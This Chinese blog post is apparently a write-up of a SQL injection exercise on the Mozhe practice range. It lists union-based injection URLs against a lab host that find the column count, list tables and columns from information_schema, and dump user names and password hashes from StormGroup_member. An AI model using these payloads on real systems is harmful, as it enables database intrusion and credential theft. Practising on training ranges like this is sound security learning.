sql手工注入漏洞测试(MYSQL)-墨者-url信息

背景:

自己在墨者官网靶场练习的时候,一直出错,手工容易出错,所以列举一些信息供大家核对,可以参考改动。

bash 复制代码
数据库版本version()              5.7.22-0ubuntu0.16.04.1
当前数据库名称database()        mozhe_Discuz_StormGroup
当前数据库用户user()             root@localhost
操作系统@@version_compile_os    Linux

信息:

一、猜列

bash 复制代码
124.70.22.208:45582/new_list.php?id=-1 order by $number

结果:1,2,3,4,只显示2,3

二、inmation_schema查表:

bash 复制代码
124.70.22.208:45582/new_list.php?id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup'

查询结果:StormGroup_member,notice

三、①StormGroup_member表中的列:

bash 复制代码
124.70.22.208:45582/new_list.php?id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='StormGroup_member'

查询结果:id,name,password,status

四、②notice表中的列:

bash 复制代码
124.70.22.208:45582/new_list.php?id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='notice'

查询结果:id,title,content,time

分析:显然StormGroup_member表中的列更符合预期,查其中的数据

五、查name,password:

bash 复制代码
124.70.22.208:45582/new_list.php?id=-1 union select 1,group_concat(name),group_concat(password),4 from StormGroup_member

查询结果,有两个name和对应的password。

总结:

md5解密后只有一个name可以使用。手工注入较为繁琐,但能锻炼对漏洞的理解,读者们发现问题可私信交流。

相关推荐
曲幽6 小时前
FastAPI + PostgreSQL 实战:从入门到不踩坑,一次讲透
python·sql·postgresql·fastapi·web·postgres·db·asyncpg
DolphinDB12 小时前
集成 Prometheus 与 DolphinDB 规则引擎,构建敏捷监控解决方案
数据库
IvorySQL12 小时前
PostgreSQL 技术日报 (3月10日)|IIoT 性能瓶颈与内核优化新讨论
数据库·postgresql·开源
DBA小马哥16 小时前
时序数据库是什么?能源行业国产化替换的入门必看
数据库·时序数据库
爱可生开源社区18 小时前
某马来西亚游戏公司如何从 SQL Server 迁移至 OceanBase?
数据库
小瓦码J码20 小时前
PostgreSQL表名超长踩坑记
数据库·postgresql
yhyyht20 小时前
InfluxDB入门记录(三)flux-dsl
数据库·后端
漏洞谷1 天前
白帽子为什么几乎都绕不开 httpx:一款 HTTP 资产探测工具的技术价值
web安全·漏洞挖掘·安全工具
IvorySQL2 天前
PostgreSQL 技术日报 (3月9日)|EXPLAIN ANALYZE 计时优化与复制语法讨论
数据库·postgresql·开源
用户8307196840822 天前
Java 告别繁琐数据统计代码!MySQL 8 窗口函数真香
java·sql·mysql